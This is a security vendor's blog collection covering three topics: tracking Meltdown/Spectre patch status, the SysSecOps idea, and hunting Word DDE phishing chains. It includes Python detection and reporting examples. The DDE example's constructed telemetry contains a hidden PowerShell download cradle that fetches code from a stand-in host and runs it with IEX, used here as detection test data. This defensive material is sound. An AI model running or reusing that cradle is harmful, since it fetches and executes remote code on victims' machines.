In Figure 1 below, you can see one example of how we report on the available patches by name, which systems have successfully installed each patch, and which have yet to install it. We can also track patch installs that failed. The example shown is not for Meltdown or Spectre, but the KB and/or patch number for the environment can be populated on this report to reveal the vulnerable systems.

The same is true for browser updates. Zenith tracks the software versions running in the environment. That data can be used to understand whether all browsers are up to date once the fixes are available.
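Both checks described above (patch installed / failed / missing per host, and browser version at or above the fixed release) can be run over any endpoint inventory export. The block below is an added example for this page, not Ziften code; the inventory is constructed, and the KB number and minimum browser versions are placeholders to be replaced with the identifiers your OS and browser vendors publish for your builds. The one thing worth copying is the numeric version comparison: a plain string compare would rank 57.0.10 below 57.0.4.

```python
"""Patch and browser-version compliance report built from an endpoint
inventory.  Added example over a constructed inventory; it is not
Ziften code.  The KB number and minimum browser versions below are
placeholders: substitute the identifiers your vendors publish."""
from __future__ import annotations
import re


def parse_version(text: str) -> tuple[int, ...]:
    """'57.0.4' -> (57, 0, 4); non-numeric tags such as 'esr' are ignored."""
    nums = re.findall(r"\d+", text)
    if not nums:
        raise ValueError(f"unparseable version: {text!r}")
    return tuple(int(n) for n in nums)


def is_outdated(installed: str, minimum: str) -> bool:
    """Numeric, zero-padded comparison so 57.0.10 is newer than 57.0.4."""
    a, b = parse_version(installed), parse_version(minimum)
    width = max(len(a), len(b))
    return a + (0,) * (width - len(a)) < b + (0,) * (width - len(b))


def patch_report(inventory: list[dict], required: dict[str, str]) -> dict[str, str]:
    """host -> 'installed' | 'failed' | 'missing' | 'n/a' for the required patch."""
    report = {}
    for ep in inventory:
        kb = required.get(ep["os"])
        if kb is None:
            report[ep["host"]] = "n/a"        # no patch mapped for this OS build yet
            continue
        status = ep["patches"].get(kb)
        report[ep["host"]] = status if status in ("installed", "failed") else "missing"
    return report


def browser_report(inventory: list[dict], minimums: dict[str, str]) -> dict[str, list[str]]:
    """host -> list of 'browser installed<minimum' entries for outdated browsers."""
    report = {}
    for ep in inventory:
        findings = []
        for name, version in ep.get("browsers", {}).items():
            floor = minimums.get(name)
            if floor and is_outdated(version, floor):
                findings.append(f"{name} {version}<{floor}")
        report[ep["host"]] = findings
    return report


# Placeholder identifiers (assumptions for illustration, not a vendor mapping).
REQUIRED_KB = {"Windows 10 1709": "KB4056892"}
MIN_BROWSER = {"Firefox": "57.0.4", "Chrome": "64.0.3282.119"}

# Constructed inventory export.
INVENTORY = [
    {"host": "ws01", "os": "Windows 10 1709",
     "patches": {"KB4056892": "installed"}, "browsers": {"Firefox": "57.0.4"}},
    {"host": "ws02", "os": "Windows 10 1709",
     "patches": {"KB4056892": "failed"}, "browsers": {"Chrome": "63.0.3239.132"}},
    {"host": "ws03", "os": "Windows 10 1709",
     "patches": {}, "browsers": {"Firefox": "57.0.10", "Chrome": "64.0.3282.119"}},
    {"host": "srv01", "os": "Ubuntu 16.04",
     "patches": {}, "browsers": {}},
]


def vulnerable_hosts() -> list[str]:
    """Hosts that are missing/failed the OS patch or run an outdated browser."""
    p = patch_report(INVENTORY, REQUIRED_KB)
    b = browser_report(INVENTORY, MIN_BROWSER)
    return sorted(h for h in p if p[h] in ("missing", "failed") or b[h])


if __name__ == "__main__":
    print(patch_report(INVENTORY, REQUIRED_KB))
    print(browser_report(INVENTORY, MIN_BROWSER))
    print("needs attention:", vulnerable_hosts())
```

Hosts reported as "n/a" are the ones to watch: they are not compliant, they simply have no patch mapped yet, and they should drop out of that bucket as soon as the vendor for that OS build ships a fix.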

Speaking of browsers, one area that has already picked up steam in the attack scenarios is using JavaScript. A working example is shown here (https://www.react-etc.net/entry/exploiting-speculative-execution-meltdown-spectre-via-javascript).

Microsoft has shipped mitigations for Edge and Internet Explorer (removing SharedArrayBuffer support and reducing the resolution of performance.now(), since these attacks depend on a precise timer), and mitigations are available for other browsers. Firefox has a fix available here (https://blog.mozilla.org/security/2018/01/03/mitigations-landing-new-class-timing-attack/). A Chrome fix is coming out soon.

Fix – Exactly What Can I Do Now?

Once you have identified vulnerable systems in your environment you will of course want to patch and fix them as soon as possible. One caveat to take into consideration: certain antivirus products were reported to cause stability issues (blue screens) when the Windows patches were applied, and Microsoft gated delivery of the January updates on a registry compatibility key that antivirus vendors set once they had verified compatibility, so a host with an unverified AV product will simply not be offered the patch. Details about these problems are here (https://www.cyberscoop.com/spectre-meltdown-microsoft-anti-virus-bsod/) and here (https://docs.google.com/spreadsheets/u/1/d/184wcDt9I9TUNFFbsAVLpzAtckQxYiuirADzf3cL42FQ/htmlview?usp=sharing&sle=true).

Zenith can also help patch systems. We can monitor for systems that need patches, direct our solution to apply those patches for you, and then report success/failure and the status of those still requiring patching.

Since the Zenith backend is cloud-based, we can even track your endpoint systems and apply the needed patches when they are not connected to your corporate network.

Track – How is it all Running?

Last but not least, some systems may exhibit performance degradation after the OS fixes are applied. These problems appear to be limited to high-load (I/O and network) systems. The Zenith platform assists both the security and operational teams within your environment, which is what we call SysSecOps (https://ziften.com/introducing-systems-security-operations-syssecops/).

We can help reveal issues such as hangs or crashes of applications, and system crashes. Plus, we monitor memory and CPU usage over time. This data can be used to monitor and alert on systems that start to exhibit high usage compared with the period before the patch was applied. An example of this tracking is shown in Figure 2 below (system names deliberately removed).
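The comparison in the paragraph above, usage after the patch against usage in the period before it, is easy to get wrong in two directions: an idle box going from 2% to 5% CPU is a 150% increase but not a regression, and a host with only a couple of post-patch samples has not produced enough data to judge. The following added example (written for this page, not Ziften code) scores each host's CPU and memory series against its own pre-patch window, using a relative threshold, an absolute floor and a minimum sample count; the hourly samples and patch times are constructed.

```python
"""Flag hosts whose CPU or memory usage rose after a patch compared with
the window before it.  Added example over constructed samples; it is not
Ziften code."""
from __future__ import annotations
from statistics import mean


def split_samples(samples: list[tuple[float, float]], patch_time: float):
    """Partition (t, value) samples into before/after the patch timestamp."""
    before = [v for t, v in samples if t < patch_time]
    after = [v for t, v in samples if t >= patch_time]
    return before, after


def regression(before: list[float], after: list[float], ratio: float = 1.5,
               floor: float = 30.0, min_samples: int = 3):
    """True when the post-patch mean exceeds the pre-patch mean by `ratio`
    AND is above `floor` percent, so a 2% -> 5% blip on an idle host is not
    flagged.  None means there is not enough data on one side to judge."""
    if len(before) < min_samples or len(after) < min_samples:
        return None
    pre, post = mean(before), mean(after)
    return post >= floor and post > pre * ratio


def patch_regressions(metrics: dict, patch_times: dict, **kw) -> dict[str, list[str]]:
    """metrics: host -> {"cpu": [(t, pct), ...], "mem": [(t, pct), ...]}.
    Returns host -> list of regressed metric names (empty list = healthy)."""
    out: dict[str, list[str]] = {}
    for host, series in metrics.items():
        flagged = []
        for name, samples in series.items():
            before, after = split_samples(samples, patch_times[host])
            if regression(before, after, **kw):
                flagged.append(name)
        out[host] = flagged
    return out


# Constructed hourly samples; t is hours since the start of capture, patch at t=24.
METRICS = {
    # busy database server: CPU steps up after the patch, memory unchanged
    "db01": {"cpu": [(t, 20.0) for t in range(0, 24)] + [(t, 55.0) for t in range(24, 48)],
             "mem": [(t, 60.0) for t in range(0, 48)]},
    # ordinary workstation: small, uninteresting drift
    "ws01": {"cpu": [(t, 10.0) for t in range(0, 24)] + [(t, 12.0) for t in range(24, 48)],
             "mem": [(t, 40.0) for t in range(0, 24)] + [(t, 42.0) for t in range(24, 48)]},
    # idle host: large relative jump but far below the absolute floor
    "idle01": {"cpu": [(t, 2.0) for t in range(0, 24)] + [(t, 5.0) for t in range(24, 48)],
               "mem": [(t, 30.0) for t in range(0, 48)]},
    # host enrolled after the patch: no pre-patch samples at all
    "new01": {"cpu": [(t, 15.0) for t in range(46, 48)],
              "mem": [(t, 35.0) for t in range(46, 48)]},
}
PATCH_TIMES = {"db01": 24, "ws01": 24, "idle01": 24, "new01": 24}


def run_demo() -> dict[str, list[str]]:
    return patch_regressions(METRICS, PATCH_TIMES)


if __name__ == "__main__":
    for host, flagged in run_demo().items():
        print(f"{host}: {'REGRESSED ' + ','.join(flagged) if flagged else 'ok'}")
```

Hosts returning None for every metric (new01 above) belong in a separate "insufficient baseline" list rather than being silently reported as healthy.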

These flaws are still new to the public, and much more will be discussed and discovered for days, weeks and months to come. Here at Ziften, we continue to monitor the situation and how we can best educate and protect our customers and partners.

Chuck Leaver – Why You Need SysSecOps

Written By Alan Zeichick And Presented By Chuck Leaver

 

SysSecOps. That’s a new phrase, still unfamiliar to many IT and security administrators – but it’s being discussed within the industry, by analysts, and at technical conferences. SysSecOps, or Systems & Security Operations, describes the practice of bringing security teams and IT operations teams together to ensure the health of enterprise technology – and having the tools to respond most effectively when problems occur.

SysSecOps focuses on tearing down the information walls, disrupting the silos, that stand between security teams and IT administrators.

IT operations staff are there to make sure that end users can access applications, and that critical infrastructure is running at all times. They want to maximize access and availability, and need the data to do that job – such as that a new employee needs to be provisioned, that a hard drive in a RAID array has failed, that a new partner needs to be given access to a secure document repository, or that an Oracle database is ready to be migrated to the cloud. It’s all about technology driving the business.

Same Data, Different Use-Cases

While the use of endpoint and network monitoring data and analytics is clearly tailored to the different needs of IT and security, it turns out that the underlying raw data is actually the same. The IT and security teams are simply looking at their own domain’s issues and scenarios – and taking action based on those use-cases.

Yet sometimes the IT and security teams have to work together. Like provisioning that new business partner: it must touch all the right systems, and be done securely. Or if there is a problem with a remote endpoint, such as a mobile phone or a device on the Industrial Internet of Things, IT and security may have to work together to determine what’s going on. When IT and security share the same data sources, and have access to the same tools, this job becomes a lot easier – and hence SysSecOps.

Imagine that an IT administrator notices that a server hard drive is nearing full capacity – and this was not anticipated. Perhaps the network has been breached, and the server is now being used to stream pirated films across the Internet. It happens, and finding and resolving that issue is a task for both IT and security. The data gathered by endpoint instrumentation, and displayed through a SysSecOps-ready monitoring platform, can help both sides work together more effectively than would happen with conventional, separate IT and security tools.

SysSecOps: it’s a new term and a new idea, and it’s resonating with both IT and security teams. You can learn more in a short 9-minute video, where I talk with several industry experts about this subject: “What is SysSecOps?”

Chuck Leaver – Be Careful Of This Microsoft Word Feature And Phishing Attacks

Written By Josh Harriman And Presented By Chuck Leaver

 

An interesting multifaceted attack has been reported in a recent blog by Cisco’s Talos Intelligence group. I wanted to talk about the infection vector of this attack, as it’s quite fascinating and something that Microsoft has pledged not to fix, as it is a feature and not a bug. Reports can be found of attacks in the wild that make use of a feature in Microsoft Word called Dynamic Data Exchange (DDE). Details of how this is accomplished are reported in this blog from SecureData. (Microsoft subsequently published security advisory ADV170021 in December 2017, which disables DDE in Word by default; the behavior described below is what shipped before that change, and it still applies to hosts that have not taken the update.)

Special Phishing Attack with Microsoft Word

Attackers are constantly searching for new ways to breach an organization. Phishing attacks are among the most common, as attackers count on someone either opening a document sent to them or visiting a ‘faked’ URL. From there, an exploit against a vulnerable piece of software usually provides the access needed to begin their attack.

In this case, however, the documents didn’t have a malicious object embedded in the Word file, which is a favored attack vector, but instead used a sly way of abusing this feature that allows Word to reach out and retrieve the real malicious files. By doing this the attackers could hope for a better infection rate, since malicious Word files themselves can be scanned and deleted before reaching the recipient.

Hunting for Suspicious Behaviors with Ziften Zenith

Here at Ziften, we wanted to be able to alert on this behavior for our clients. Finding conditions that indicate ‘odd’ behavior, such as Microsoft Word spawning a shell, is interesting and not expected. Take it a step further and look for PowerShell running from that spawned shell, and it gets ‘very’ interesting. Through our Search API, we can find these behaviors whenever they happened. We do not need the system to be switched on at the time of the search: if it has run a program (in this case Word) that exhibited these behaviors, we can find that system. Ziften is constantly gathering and sending relevant process information, which is why we can find the data without depending on the system state at the time of the search.

In our Zenith console, I searched for this condition with the following:

Process → Filepath includes word.exe, Child Process Filepath includes cmd.exe, Child Process commandline includes powershell

This returns the PIDs (process IDs) of the processes that started under these conditions. From there we can drill down to see the critical details.
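The console query above is a parent/child join over process telemetry: find every cmd.exe whose command line mentions powershell, look up its parent, and keep the pair when the parent image contains "word.exe" (a substring match, which is why "word.exe" also catches WINWORD.EXE). The block below is an added example written for this page, not Ziften's Search API; the process records, host names, user names and the download URL are constructed. It keys processes by (host, pid) because PIDs are recycled and are only unique within one host, and the patterns are parameters so the same join can hunt other parent/child combinations.

```python
"""Hunt for Word -> cmd.exe -> PowerShell chains in process telemetry.
Added example over constructed records; it is not Ziften's Search API."""
from __future__ import annotations
from dataclasses import dataclass


@dataclass
class Proc:
    host: str
    pid: int
    ppid: int
    image: str
    cmdline: str
    user: str = ""
    start: str = ""


def find_chains(procs: list[Proc], parent_pat: str = "word.exe",
                child_pat: str = "cmd.exe", child_cmd_pat: str = "powershell") -> list[dict]:
    """One hit per (parent, child) pair where the child's image contains
    `child_pat`, its command line contains `child_cmd_pat`, and its direct
    parent's image contains `parent_pat`.  Case-insensitive substring match,
    like the console query, so 'word.exe' also matches 'WINWORD.EXE'."""
    by_key = {(p.host, p.pid): p for p in procs}   # PIDs are only unique per host
    hits = []
    for child in procs:
        if child_pat not in child.image.lower() or child_cmd_pat not in child.cmdline.lower():
            continue
        parent = by_key.get((child.host, child.ppid))
        if parent is None or parent_pat not in parent.image.lower():
            continue
        hits.append({"host": child.host, "user": parent.user, "start": parent.start,
                     "parent_pid": parent.pid, "child_pid": child.pid,
                     "cmdline": child.cmdline})
    return hits


# Constructed telemetry: one DDE-style chain plus two benign look-alikes.
PROCS = [
    Proc("ws07", 884, 1, r"C:\Windows\explorer.exe", "explorer.exe", r"CORP\alice"),
    Proc("ws07", 4120, 884, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
         r'"WINWORD.EXE" /n "invoice.docx"', r"CORP\alice", "2017-10-12T14:02:11Z"),
    Proc("ws07", 5200, 4120, r"C:\Windows\System32\cmd.exe",
         r'cmd.exe /k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient)'
         r'.DownloadString("http://example.invalid/fonts.txt");IEX $e',
         r"CORP\alice", "2017-10-12T14:02:40Z"),
    Proc("ws07", 5212, 5200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "powershell -NoP -sta -NonI -w hidden ...", r"CORP\alice", "2017-10-12T14:02:41Z"),
    # Benign: Word spawning the 32-bit print helper, no shell involved.
    Proc("ws07", 4300, 4120, r"C:\Windows\splwow64.exe", "splwow64.exe", r"CORP\alice"),
    # Benign: an admin running PowerShell from a cmd window opened from Explorer.
    Proc("ws09", 900, 1, r"C:\Windows\explorer.exe", "explorer.exe", r"CORP\bob"),
    Proc("ws09", 7000, 900, r"C:\Windows\System32\cmd.exe",
         "cmd.exe /c powershell Get-Process", r"CORP\bob"),
]


def run_hunt() -> list[dict]:
    return find_chains(PROCS)


if __name__ == "__main__":
    for hit in run_hunt():
        print(f"{hit['host']} {hit['user']} word pid {hit['parent_pid']} -> "
              f"cmd pid {hit['child_pid']} at {hit['start']}")
        print("   ", hit["cmdline"])
```

The returned command line is the drill-down detail worth keeping in the alert: it carries the download URL and the interpreter flags (-NoP, -w hidden, IEX) that distinguish a staged payload from an administrator's shell.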

In this first image, we can see details of the process tree (Word spawning CMD with PowerShell under that) on the left, and on the right you can see details such as the system name and user, plus the start time.

In the next image, we look at the CMD process and see what was passed to PowerShell.

Most likely, when the user answered the Microsoft Word pop-up dialog box, that is when the CMD shell used PowerShell to go out and retrieve code hosted on the Louisiana Gov website. In the PowerShell image below we can see more details, such as the network connection made when it reached out to the website to pull the fonts.txt file.

That IP address (206.218.181.46) is in fact the Louisiana Gov website. We often see interesting data within our network connection information that may not match what you expect.

After creating our saved search, we can alert on these conditions as they occur across the environment. We can also build extensions that change a GPO policy to disable DDE, or even take further action and go and find these files and remove them from the system if desired. Being able to find interesting combinations of conditions within an environment is extremely powerful, and we are delighted to have this capability in our offering.